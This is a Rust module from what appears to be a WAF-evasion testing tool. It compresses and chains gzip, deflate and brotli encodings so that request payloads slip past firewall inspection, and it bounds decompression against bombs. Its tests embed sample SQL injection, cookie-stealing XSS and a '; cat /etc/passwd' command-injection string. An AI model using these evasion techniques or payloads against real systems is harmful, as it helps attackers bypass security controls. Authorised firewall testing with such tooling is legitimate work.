Skip to main content

wafrift_encoding/
compression.rs

1//! `compression` — request-body compression as a WAF-evasion surface.
2//!
3//! ## The attack
4//!
5//! Almost every WAF in production today inspects raw request bytes,
6//! NOT the decompressed payload. The reasoning is operational: a
7//! WAF that decompresses inbound bodies pays the CPU cost of
8//! decompression on every request, and many vendors choose to skip
9//! that — either entirely, or selectively per `Content-Encoding`
10//! algorithm.
11//!
12//! That choice is the seam this module exploits:
13//!
14//! - **`Content-Encoding: gzip`** is the universal case; nearly all
15//!   WAFs decompress it. Useful as the baseline + as a chain
16//!   ingredient.
17//! - **`Content-Encoding: deflate`** is RFC-permitted but irregularly
18//!   supported — many WAFs that handle gzip return 400 on a
19//!   `deflate`-coded body. The origin (nginx, IIS, Apache, Node,
20//!   PHP-FPM, anything using zlib) accepts both.
21//! - **`Content-Encoding: br`** (Brotli) is where the seam is widest.
22//!   Brotli requires a separate decompressor (not zlib). Many WAFs
23//!   ship no brotli support at all — they either return 415 (and
24//!   the operator avoids `br`), or worse, they pass the request
25//!   through uninspected because their rule engine has nothing to
26//!   match against. Origins ARE brotli-capable (Chrome 49+,
27//!   Firefox 44+, nginx 1.11+ with the `brotli` module). Wrap a
28//!   payload in brotli and the rule corpus that fires on the plain
29//!   payload bytes never gets a chance to match.
30//!
31//! ## Chained encoding
32//!
33//! Encoding-chain attacks add layers (e.g. `gzip → base64 → urlenc`).
34//! The WAF, which normalises only a fixed number of decode passes
35//! (usually 1, sometimes 2), stops short of the original payload —
36//! while the origin's parser stack (which decodes more layers as
37//! Content-Type / Content-Encoding direct) reaches it. `chain` is
38//! the primitive for this attack.
39//!
40//! ## Pristine code
41//!
//! - Every fallible public function returns `Result<_, CompressionError>` —
//!   no `unwrap()` reachable on bad input.
44//! - The chain function caps at 16 layers so a misconfiguration
45//!   (`gzip,gzip,gzip,...`) can't run away.
46//! - Empty body is permitted and returns the compressor's idempotent
47//!   marker (gzip has a 10-byte header even for empty input, brotli
48//!   is similar).
49//! - No allocation beyond what each encoder requires; the public
50//!   API takes a borrowed slice, not an owned Vec.
51
52use thiserror::Error;
53
54/// Errors raised by the compression-confusion API. Wraps the
55/// underlying encoder failures (rare for in-memory operations) plus
56/// the chain-depth cap.
57#[derive(Debug, Error)]
58pub enum CompressionError {
59    #[error("compression chain exceeded the {0}-layer safety cap")]
60    ChainTooDeep(usize),
61    #[error("gzip encoder error: {0}")]
62    Gzip(std::io::Error),
63    #[error("deflate encoder error: {0}")]
64    Deflate(std::io::Error),
65    #[error("brotli encoder error: {0}")]
66    Brotli(std::io::Error),
67    #[error(
68        "decompression bomb: output exceeded {cap_bytes}-byte cap \
69         ({observed_bytes} bytes produced) — aborted before OOM"
70    )]
71    DecompressionBomb {
72        cap_bytes: usize,
73        observed_bytes: usize,
74    },
75}
76
/// Maximum number of layers a chain may contain.
///
/// A longer list is almost certainly a misconfiguration, and every extra
/// layer adds its own header overhead to the output. 16 is deliberately
/// generous: the original author notes that real attacks use 2–3 layers.
pub const MAX_CHAIN_LAYERS: usize = 16;
82
83/// Hard cap on decoded body size — defends against decompression
84/// bombs. A 1 KB malicious gzip can decompress to 10+ GB if read
85/// without bounds.
86///
87/// §7: this IS the workspace-canonical [`wafrift_types::MAX_RESPONSE_BODY_BYTES`]
88/// — the comment previously noted "matches the response-body cap elsewhere",
89/// but that coupling is now ENFORCED by sharing the constant rather than
90/// hoping two literals stay equal. The public name is preserved.
91pub const DECOMPRESSED_BODY_MAX_BYTES: usize = wafrift_types::MAX_RESPONSE_BODY_BYTES;
92
/// A single content coding. Each variant corresponds to one value of the
/// HTTP `Content-Encoding` registry (see [`Algorithm::content_encoding`]).
#[derive(Debug, Copy, Clone, PartialEq, Eq, Hash)]
pub enum Algorithm {
    /// gzip (RFC 1952) — understood practically everywhere.
    Gzip,
    /// Raw deflate (RFC 1951) — permitted, but WAF support is patchy.
    Deflate,
    /// Brotli (RFC 7932) — the coding with the widest WAF gap.
    Brotli,
    /// Pass-through: the bytes are left untouched. Handy as a chain anchor
    /// when the operator wants an explicit `Content-Encoding: identity`.
    Identity,
}

impl Algorithm {
    /// Returns the lowercase `Content-Encoding` token naming this coding.
    #[must_use]
    pub fn content_encoding(self) -> &'static str {
        match self {
            Self::Identity => "identity",
            Self::Brotli => "br",
            Self::Deflate => "deflate",
            Self::Gzip => "gzip",
        }
    }

    /// Looks up the coding named by a `Content-Encoding` token.
    ///
    /// Surrounding whitespace is ignored and the comparison is ASCII
    /// case-insensitive. The legacy alias `x-gzip` maps to [`Algorithm::Gzip`].
    /// Anything else — including the empty string — yields `None`.
    #[must_use]
    pub fn from_token(token: &str) -> Option<Self> {
        // Every accepted spelling, paired with the coding it names.
        const KNOWN_TOKENS: [(&str, Algorithm); 5] = [
            ("gzip", Algorithm::Gzip),
            ("x-gzip", Algorithm::Gzip),
            ("deflate", Algorithm::Deflate),
            ("br", Algorithm::Brotli),
            ("identity", Algorithm::Identity),
        ];
        let needle = token.trim();
        KNOWN_TOKENS
            .iter()
            .find(|(spelling, _)| needle.eq_ignore_ascii_case(spelling))
            .map(|&(_, algo)| algo)
    }
}
136
/// Encoded body bytes paired with the `Content-Encoding` value that
/// describes them.
///
/// The two fields travel together on purpose: the caller writes `body` to
/// the wire verbatim and sends `content_encoding` as the header. A body
/// paired with the wrong header is painful for the operator to debug.
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct CompressedBody {
    /// The bytes to put on the wire, already encoded.
    pub body: Vec<u8>,
    /// The `Content-Encoding` header value for `body`. A single-layer body
    /// carries one token (e.g. `"gzip"`); a multi-layer body carries a
    /// comma-separated list (e.g. `"gzip, br"`). RFC 9110 §8.4 defines
    /// that list as the codings in the order in which they were applied.
    pub content_encoding: String,
}
151
152/// Compress `body` with a single algorithm. Returns the raw
153/// compressed bytes + the matching `Content-Encoding` header value.
154///
155/// # Errors
156/// Returns [`CompressionError`] if the underlying encoder fails. In
157/// practice this is rare for in-memory operations — gzip/deflate/
158/// brotli never error on well-formed input slices.
159pub fn compress(body: &[u8], algo: Algorithm) -> Result<CompressedBody, CompressionError> {
160    let bytes = compress_bytes(body, algo)?;
161    Ok(CompressedBody {
162        body: bytes,
163        content_encoding: algo.content_encoding().to_string(),
164    })
165}
166
167/// Inner helper — returns just the bytes (no header). Used by
168/// [`chain`] to layer compressions before assembling the final
169/// `Content-Encoding` string.
170fn compress_bytes(body: &[u8], algo: Algorithm) -> Result<Vec<u8>, CompressionError> {
171    use std::io::Write;
172    match algo {
173        Algorithm::Identity => Ok(body.to_vec()),
174        Algorithm::Gzip => {
175            let mut enc = flate2::write::GzEncoder::new(Vec::new(), flate2::Compression::default());
176            enc.write_all(body).map_err(CompressionError::Gzip)?;
177            enc.finish().map_err(CompressionError::Gzip)
178        }
179        Algorithm::Deflate => {
180            let mut enc =
181                flate2::write::DeflateEncoder::new(Vec::new(), flate2::Compression::default());
182            enc.write_all(body).map_err(CompressionError::Deflate)?;
183            enc.finish().map_err(CompressionError::Deflate)
184        }
185        Algorithm::Brotli => {
186            // brotli crate exposes a `CompressorWriter`-style API.
187            // `quality` 6 is the default Chrome / Firefox ship for
188            // dynamic content; lower compression ratio than 11 but
189            // an order of magnitude faster, which is the right
190            // trade-off for an attack tool firing many variants.
191            let mut out = Vec::new();
192            let mut writer = brotli::CompressorWriter::new(&mut out, 4096, 6, 22);
193            writer.write_all(body).map_err(CompressionError::Brotli)?;
194            writer.flush().map_err(CompressionError::Brotli)?;
195            drop(writer);
196            Ok(out)
197        }
198    }
199}
200
201/// Apply a sequence of compression algorithms in order, producing
202/// one set of body bytes + the joint `Content-Encoding` header.
203///
204/// The header value lists the algorithms in the order they were
205/// applied — per RFC 9110 §8.4, the LEFTMOST algorithm is the OUTERMOST
206/// wrapper, meaning a decoder must apply them right-to-left. So
207/// `chain(body, [Gzip, Brotli])` produces a body that is
208/// `gzip(brotli(body))` with header `gzip, br`.
209///
210/// Capped at [`MAX_CHAIN_LAYERS`] to prevent runaway misconfiguration.
211///
212/// # Errors
213/// Returns [`CompressionError::ChainTooDeep`] when `algos.len() >
214/// MAX_CHAIN_LAYERS`, or the wrapped algorithm's error if one of
215/// the encoders fails.
216pub fn chain(body: &[u8], algos: &[Algorithm]) -> Result<CompressedBody, CompressionError> {
217    if algos.len() > MAX_CHAIN_LAYERS {
218        return Err(CompressionError::ChainTooDeep(MAX_CHAIN_LAYERS));
219    }
220    if algos.is_empty() {
221        return Ok(CompressedBody {
222            body: body.to_vec(),
223            content_encoding: Algorithm::Identity.content_encoding().to_string(),
224        });
225    }
226    // Apply innermost to outermost: reverse of header order. So
227    // `algos = [Gzip, Brotli]` means body is gzip(brotli(...)), and
228    // we apply Brotli FIRST then Gzip on top.
229    let mut current = body.to_vec();
230    for algo in algos.iter().rev() {
231        current = compress_bytes(&current, *algo)?;
232    }
233    // The header lists outer-to-inner.
234    let header = algos
235        .iter()
236        .map(|a| a.content_encoding())
237        .collect::<Vec<_>>()
238        .join(", ");
239    Ok(CompressedBody {
240        body: current,
241        content_encoding: header,
242    })
243}
244
245/// Recover the original bytes from a [`CompressedBody`] — the
246/// inverse of [`compress`] / [`chain`]. Test-only and audit
247/// helper; production attack flow only needs the compress
248/// direction.
249///
250/// # Errors
251/// Returns [`CompressionError`] if any decoder fails or the
252/// `content_encoding` string lists an unknown algorithm.
253pub fn decompress(blob: &CompressedBody) -> Result<Vec<u8>, CompressionError> {
254    let algos: Vec<Algorithm> = blob
255        .content_encoding
256        .split(',')
257        .filter_map(Algorithm::from_token)
258        .collect();
259    // §3 contract symmetry with `chain`: the forward direction refuses
260    // more than MAX_CHAIN_LAYERS, so its documented inverse must too. A
261    // crafted `gzip,gzip,…×N` header would otherwise drive an unbounded
262    // decode loop (each stage is size-capped by `drain_capped`, but the
263    // LAYER COUNT was not — O(N) work amplification). Counting recognised
264    // algos (post-`filter_map`) preserves the permissive "skip unknown
265    // coding" behaviour: `snappy, gzip` is still a 1-layer decode.
266    if algos.len() > MAX_CHAIN_LAYERS {
267        return Err(CompressionError::ChainTooDeep(MAX_CHAIN_LAYERS));
268    }
269    let mut current = blob.body.clone();
270    // Decode in the SAME order the header lists (outer-to-inner).
271    for algo in &algos {
272        current = decompress_bytes(&current, *algo)?;
273    }
274    Ok(current)
275}
276
277/// Read at most `DECOMPRESSED_BODY_MAX_BYTES` from `reader`, then
278/// promote a "+1 byte produced" into a `DecompressionBomb` error.
279/// Takes a generic `R: Read` (sized) so `Read::take` works without
280/// trait-object gymnastics; called from each algorithm arm below.
281fn drain_capped<R: std::io::Read>(
282    mut reader: R,
283    map_io: fn(std::io::Error) -> CompressionError,
284) -> Result<Vec<u8>, CompressionError> {
285    use std::io::Read;
286    let cap = DECOMPRESSED_BODY_MAX_BYTES;
287    let mut out = Vec::with_capacity(8 * 1024);
288    let mut limited = (&mut reader).take((cap as u64) + 1);
289    limited.read_to_end(&mut out).map_err(map_io)?;
290    if out.len() > cap {
291        return Err(CompressionError::DecompressionBomb {
292            cap_bytes: cap,
293            observed_bytes: out.len(),
294        });
295    }
296    Ok(out)
297}
298
299fn decompress_bytes(bytes: &[u8], algo: Algorithm) -> Result<Vec<u8>, CompressionError> {
300    match algo {
301        Algorithm::Identity => {
302            // No decompression — but still refuse to clone a slice
303            // that already exceeds the body cap (a sign something
304            // upstream missed a boundary check).
305            if bytes.len() > DECOMPRESSED_BODY_MAX_BYTES {
306                return Err(CompressionError::DecompressionBomb {
307                    cap_bytes: DECOMPRESSED_BODY_MAX_BYTES,
308                    observed_bytes: bytes.len(),
309                });
310            }
311            Ok(bytes.to_vec())
312        }
313        Algorithm::Gzip => {
314            drain_capped(flate2::read::GzDecoder::new(bytes), CompressionError::Gzip)
315        }
316        Algorithm::Deflate => drain_capped(
317            flate2::read::DeflateDecoder::new(bytes),
318            CompressionError::Deflate,
319        ),
320        Algorithm::Brotli => drain_capped(
321            brotli::Decompressor::new(bytes, 4096),
322            CompressionError::Brotli,
323        ),
324    }
325}
326
#[cfg(test)]
mod tests {
    use super::*;

    // ── Algorithm tokens ───────────────────────────────────────────

    #[test]
    fn content_encoding_tokens_match_rfc_registry() {
        assert_eq!(Algorithm::Gzip.content_encoding(), "gzip");
        assert_eq!(Algorithm::Deflate.content_encoding(), "deflate");
        assert_eq!(Algorithm::Brotli.content_encoding(), "br");
        assert_eq!(Algorithm::Identity.content_encoding(), "identity");
    }

    #[test]
    fn from_token_is_case_insensitive_and_trim_tolerant() {
        for spelling in ["gzip", "GZIP", "Gzip", "  gzip  ", "\tgzip"] {
            assert_eq!(Algorithm::from_token(spelling), Some(Algorithm::Gzip));
        }
    }

    #[test]
    fn from_token_accepts_x_gzip_alias() {
        // RFC 7230 §4.2.3 documents `x-gzip` as an alias of `gzip`.
        // Some legacy origins / WAFs still emit it.
        assert_eq!(Algorithm::from_token("x-gzip"), Some(Algorithm::Gzip));
        assert_eq!(Algorithm::from_token("X-GZIP"), Some(Algorithm::Gzip));
    }

    #[test]
    fn from_token_rejects_unknown_codings() {
        assert_eq!(Algorithm::from_token(""), None);
        assert_eq!(Algorithm::from_token("snappy"), None);
        assert_eq!(Algorithm::from_token("lz4"), None);
        // `compress` (old UNIX) is not in our supported set.
        assert_eq!(Algorithm::from_token("compress"), None);
    }

    // ── single-algorithm round trip ────────────────────────────────

    #[test]
    fn gzip_round_trip_preserves_payload() {
        let original = b"' OR 1=1--";
        let compressed = compress(original, Algorithm::Gzip).expect("gzip");
        assert_eq!(compressed.content_encoding, "gzip");
        assert_ne!(compressed.body.as_slice(), original);
        let recovered = decompress(&compressed).expect("decompress");
        assert_eq!(recovered, original);
    }

    #[test]
    fn deflate_round_trip_preserves_payload() {
        let original = b"<script>alert(1)</script>";
        let compressed = compress(original, Algorithm::Deflate).expect("deflate");
        assert_eq!(compressed.content_encoding, "deflate");
        let recovered = decompress(&compressed).expect("decompress");
        assert_eq!(recovered, original);
    }

    #[test]
    fn brotli_round_trip_preserves_payload() {
        // Brotli is the headline attack vector — round-trip MUST be
        // clean or every brotli-based scan ships broken payloads.
        let original = b"http://127.0.0.1:9000/admin?cmd=id";
        let compressed = compress(original, Algorithm::Brotli).expect("brotli");
        assert_eq!(compressed.content_encoding, "br");
        let recovered = decompress(&compressed).expect("decompress");
        assert_eq!(recovered, original);
    }

    #[test]
    fn identity_is_passthrough_with_identity_header() {
        let original = b"plain text";
        let compressed = compress(original, Algorithm::Identity).expect("identity");
        assert_eq!(compressed.body, original);
        assert_eq!(compressed.content_encoding, "identity");
    }

    // ── chain ─────────────────────────────────────────────────────

    #[test]
    fn chain_with_one_algo_matches_single_compress() {
        let original = b"single layer";
        let chained = chain(original, &[Algorithm::Gzip]).expect("chain");
        let single = compress(original, Algorithm::Gzip).expect("compress");
        assert_eq!(chained, single);
    }

    #[test]
    fn chain_with_two_algos_round_trips() {
        // The classic compression-confusion shape: two different codings
        // layered on top of each other. The header must name both, and
        // `decompress` must peel both to get the payload back.
        let original = b"' UNION SELECT username,password FROM users --";
        let chained = chain(original, &[Algorithm::Gzip, Algorithm::Brotli]).expect("chain");
        assert_eq!(chained.content_encoding, "gzip, br");
        let recovered = decompress(&chained).expect("decompress");
        assert_eq!(recovered, original);
    }

    #[test]
    fn chain_empty_algos_returns_identity_body() {
        let original = b"unchanged";
        let chained = chain(original, &[]).expect("empty chain");
        assert_eq!(chained.body, original);
        assert_eq!(chained.content_encoding, "identity");
    }

    #[test]
    fn chain_above_cap_returns_too_deep_error() {
        let too_many: Vec<Algorithm> = (0..MAX_CHAIN_LAYERS + 1).map(|_| Algorithm::Gzip).collect();
        let result = chain(b"payload", &too_many);
        match result {
            Err(CompressionError::ChainTooDeep(cap)) => assert_eq!(cap, MAX_CHAIN_LAYERS),
            other => panic!("expected ChainTooDeep error, got {other:?}"),
        }
    }

    #[test]
    fn chain_at_exactly_cap_succeeds() {
        let just_enough: Vec<Algorithm> =
            (0..MAX_CHAIN_LAYERS).map(|_| Algorithm::Identity).collect();
        let chained = chain(b"x", &just_enough).expect("at-cap chain ok");
        // All-identity chain leaves the body untouched.
        assert_eq!(chained.body, b"x");
    }

    #[test]
    fn chain_with_identity_in_the_middle_is_transparent() {
        // chain([Gzip, Identity, Brotli]) ≡ chain([Gzip, Brotli]) at
        // the bytes level, but the header lists ALL three (we honour
        // exactly what the operator asked for in the header).
        let original = b"middle identity";
        let with_id = chain(
            original,
            &[Algorithm::Gzip, Algorithm::Identity, Algorithm::Brotli],
        )
        .expect("chain with identity");
        let without =
            chain(original, &[Algorithm::Gzip, Algorithm::Brotli]).expect("chain without identity");
        assert_eq!(
            with_id.body, without.body,
            "identity must be byte-transparent"
        );
        assert_eq!(with_id.content_encoding, "gzip, identity, br");
        let recovered = decompress(&with_id).expect("decompress with id");
        assert_eq!(recovered, original);
    }

    // ── edge cases & adversarial inputs ───────────────────────────

    #[test]
    fn empty_body_compresses_and_round_trips() {
        for algo in [
            Algorithm::Gzip,
            Algorithm::Deflate,
            Algorithm::Brotli,
            Algorithm::Identity,
        ] {
            let compressed =
                compress(b"", algo).unwrap_or_else(|e| panic!("empty body with {algo:?}: {e}"));
            let recovered = decompress(&compressed)
                .unwrap_or_else(|e| panic!("empty body decode with {algo:?}: {e}"));
            assert_eq!(recovered, Vec::<u8>::new());
        }
    }

    #[test]
    fn one_byte_body_round_trips_under_every_algorithm() {
        for algo in [
            Algorithm::Gzip,
            Algorithm::Deflate,
            Algorithm::Brotli,
            Algorithm::Identity,
        ] {
            let original = &[0xAB_u8][..];
            let compressed = compress(original, algo).expect("compress");
            let recovered = decompress(&compressed).expect("decompress");
            assert_eq!(recovered, original);
        }
    }

    #[test]
    fn large_body_64_kib_round_trips_without_oom() {
        // 64 KiB is a realistic body size for an instrumented
        // payload. All compressors must handle it without spiking
        // memory (caller's allocator) or losing fidelity.
        let original: Vec<u8> = (0..(64 * 1024)).map(|i| (i % 251) as u8).collect();
        for algo in [Algorithm::Gzip, Algorithm::Deflate, Algorithm::Brotli] {
            let compressed = compress(&original, algo).expect("compress");
            // Compressed should be SMALLER than original on this
            // pattern (it repeats every 251 bytes).
            assert!(
                compressed.body.len() < original.len(),
                "{algo:?} should compress this pattern, got {} >= {}",
                compressed.body.len(),
                original.len()
            );
            let recovered = decompress(&compressed).expect("decompress");
            assert_eq!(recovered, original);
        }
    }

    #[test]
    fn incompressible_body_does_not_panic_on_brotli() {
        // Some inputs make an encoder return BIGGER output than input
        // (header overhead). Whatever the encoder does with this
        // scrambled-looking pattern, it must not panic and the round
        // trip must stay clean.
        let mut original = vec![0u8; 1024];
        for (i, b) in original.iter_mut().enumerate() {
            // Low byte of a multiplicative hash of the index. Only the
            // round trip is asserted, not the compression ratio.
            *b = ((i.wrapping_mul(2654435769)) & 0xFF) as u8;
        }
        let compressed = compress(&original, Algorithm::Brotli).expect("brotli");
        let recovered = decompress(&compressed).expect("decompress");
        assert_eq!(recovered, original);
    }

    #[test]
    fn decompress_with_unknown_coding_token_skips_it() {
        // If a hand-crafted CompressedBody has a Content-Encoding
        // listing an unknown coding (e.g. `snappy, gzip`), our
        // decompressor SKIPS the unknown token and tries the rest.
        // A production decoder that cannot handle a coding would
        // answer 415, but this recovery helper is a debugging aid and
        // is deliberately permissive.
        let body = b"hello";
        let compressed = compress(body, Algorithm::Gzip).unwrap();
        let with_unknown = CompressedBody {
            content_encoding: format!("snappy, {}", compressed.content_encoding),
            body: compressed.body,
        };
        let recovered = decompress(&with_unknown).expect("permissive decompress");
        assert_eq!(recovered, body);
    }

    #[test]
    fn decompress_rejects_more_than_max_chain_layers() {
        // Contract-symmetry regression: `chain` refuses > MAX_CHAIN_LAYERS,
        // so its inverse `decompress` must too — otherwise a crafted
        // `gzip,gzip,…×N` Content-Encoding header drives an O(N) decode loop.
        // The cap is checked BEFORE any decode work, so the body can be empty.
        let header = std::iter::repeat_n("gzip", MAX_CHAIN_LAYERS + 1)
            .collect::<Vec<_>>()
            .join(", ");
        let blob = CompressedBody {
            content_encoding: header,
            body: Vec::new(),
        };
        match decompress(&blob) {
            Err(CompressionError::ChainTooDeep(cap)) => assert_eq!(cap, MAX_CHAIN_LAYERS),
            other => panic!("expected ChainTooDeep, got {other:?}"),
        }
    }

    #[test]
    fn decompress_layer_cap_counts_recognised_codings_only() {
        // The cap counts RECOGNISED algos, so a header padded with many
        // unknown codings is still a shallow decode and must NOT trip the
        // cap — preserving the permissive "skip unknown" contract.
        let body = b"hello world";
        let compressed = compress(body, Algorithm::Gzip).unwrap();
        // (MAX+5) unknown `snappy` tokens + one real gzip = 1 recognised layer.
        let mut tokens: Vec<String> = std::iter::repeat_n("snappy", MAX_CHAIN_LAYERS + 5)
            .map(str::to_string)
            .collect();
        tokens.push(compressed.content_encoding.clone());
        let blob = CompressedBody {
            content_encoding: tokens.join(", "),
            body: compressed.body,
        };
        let recovered = decompress(&blob).expect("unknown-padded header is a 1-layer decode");
        assert_eq!(recovered, body);
    }

    // ── adversarial round-trip property ────────────────────────────

    #[test]
    fn round_trip_property_holds_across_a_variety_of_payloads() {
        // Anti-rig: a degenerate compressor that always returned
        // the empty string would pass single-payload tests if those
        // happened to be empty. Exercise many distinct payloads.
        let corpus: &[&[u8]] = &[
            b"",
            b"x",
            b"' OR 1=1--",
            b"<script>alert(document.cookie)</script>",
            b"http://127.0.0.1/admin",
            b"; cat /etc/passwd",
            b"\x00\x01\x02\x03\xff\xfe",
            b"the quick brown fox jumps over the lazy dog the quick brown fox",
        ];
        for payload in corpus {
            for algo in [
                Algorithm::Gzip,
                Algorithm::Deflate,
                Algorithm::Brotli,
                Algorithm::Identity,
            ] {
                let c = compress(payload, algo)
                    .unwrap_or_else(|e| panic!("{algo:?} on {payload:?}: {e}"));
                let r = decompress(&c)
                    .unwrap_or_else(|e| panic!("decompress {algo:?} on {payload:?}: {e}"));
                assert_eq!(r, *payload, "{algo:?} round-trip mismatch on {payload:?}");
            }
        }
    }

    // ── decompression bomb defence ────────────────────────────────
    //
    // Every decode stage must return DecompressionBomb once its output
    // exceeds DECOMPRESSED_BODY_MAX_BYTES; an unbounded `read_to_end`
    // lets a ~1 KB malicious gzip blob expand to many gigabytes.
    //
    // The tests below hit the cap from three sides: the Identity arm's
    // explicit length check, a real gzip stream that stays under the cap,
    // and `drain_capped` itself fed by an endless reader.

    #[test]
    fn identity_decompress_rejects_oversize_input() {
        // Identity short-circuits to a clone; it still must refuse
        // anything above the cap so a single-layer chain on a
        // multi-GB body cannot pass through.
        let oversized = vec![0u8; DECOMPRESSED_BODY_MAX_BYTES + 1];
        let err = super::decompress_bytes(&oversized, Algorithm::Identity)
            .expect_err("identity decompress must refuse > cap input");
        match err {
            CompressionError::DecompressionBomb {
                cap_bytes,
                observed_bytes,
            } => {
                assert_eq!(cap_bytes, DECOMPRESSED_BODY_MAX_BYTES);
                assert_eq!(observed_bytes, DECOMPRESSED_BODY_MAX_BYTES + 1);
            }
            other => panic!("expected DecompressionBomb, got {other:?}"),
        }
    }

    #[test]
    fn gzip_decompress_under_cap_succeeds() {
        // 1 MiB of zeros compresses to ~1 KiB under gzip and is well
        // below DECOMPRESSED_BODY_MAX_BYTES (64 MiB) — must succeed.
        use std::io::Write;
        let mut enc = flate2::write::GzEncoder::new(Vec::new(), flate2::Compression::default());
        enc.write_all(&vec![0u8; 1024 * 1024]).expect("compress");
        let compressed = enc.finish().expect("gzip finish");
        let ok = super::decompress_bytes(&compressed, Algorithm::Gzip).expect("under cap");
        assert_eq!(ok.len(), 1024 * 1024);
    }

    #[test]
    fn drain_capped_returns_bomb_error_on_over_cap_source() {
        // Drive the real helper, not a re-implementation of its logic.
        // `std::io::repeat` never reaches EOF, so the only thing that can
        // end the read is drain_capped's own `take(cap + 1)` limit. The
        // result must be DecompressionBomb — not a silently truncated
        // buffer, and not the algorithm-specific I/O wrapper passed as
        // `map_io`.
        let err = super::drain_capped(std::io::repeat(b'A'), CompressionError::Gzip)
            .expect_err("an endless source must trip the cap");
        match err {
            CompressionError::DecompressionBomb {
                cap_bytes,
                observed_bytes,
            } => {
                assert_eq!(cap_bytes, DECOMPRESSED_BODY_MAX_BYTES);
                // Exactly one byte past the cap is read before bailing out.
                assert_eq!(observed_bytes, DECOMPRESSED_BODY_MAX_BYTES + 1);
            }
            other => panic!("expected DecompressionBomb, got {other:?}"),
        }
    }
}